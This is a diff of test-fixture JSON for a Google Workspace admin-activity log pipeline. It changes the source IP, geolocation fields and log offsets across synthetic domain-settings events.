@@ -2857,26 +2645,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 22925, + "log.offset": 22872, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2897,7 +2681,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -2910,27 +2694,23 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 23322, + "log.offset": 23268, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -2955,7 +2735,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -2968,26 +2748,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 23761, + "log.offset": 23706, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3009,7 +2785,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3022,26 +2798,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 24181, + "log.offset": 24125, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3062,7 +2834,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "info" 
@@ -3074,26 +2846,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 24611, + "log.offset": 24554, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3114,7 +2882,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "event.provider": "admin", "event.type": [ "creation" 
@@ -3126,26 +2894,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 24997, + "log.offset": 24939, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3167,7 +2931,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3180,26 +2944,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 25391, + "log.offset": 25332, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3220,7 +2980,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3234,26 +2994,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 25810, + "log.offset": 25750, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3275,7 +3031,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3290,26 +3046,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 26266, + "log.offset": 26205, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3330,7 +3082,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3344,26 +3096,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 26758, + "log.offset": 26696, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3384,7 +3132,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3398,26 +3146,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 27216, + "log.offset": 27153, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3438,7 +3182,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -3452,26 +3196,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 27674, + "log.offset": 27610, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -3493,7 +3233,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "event.provider": "admin", "event.type": [ "change" 
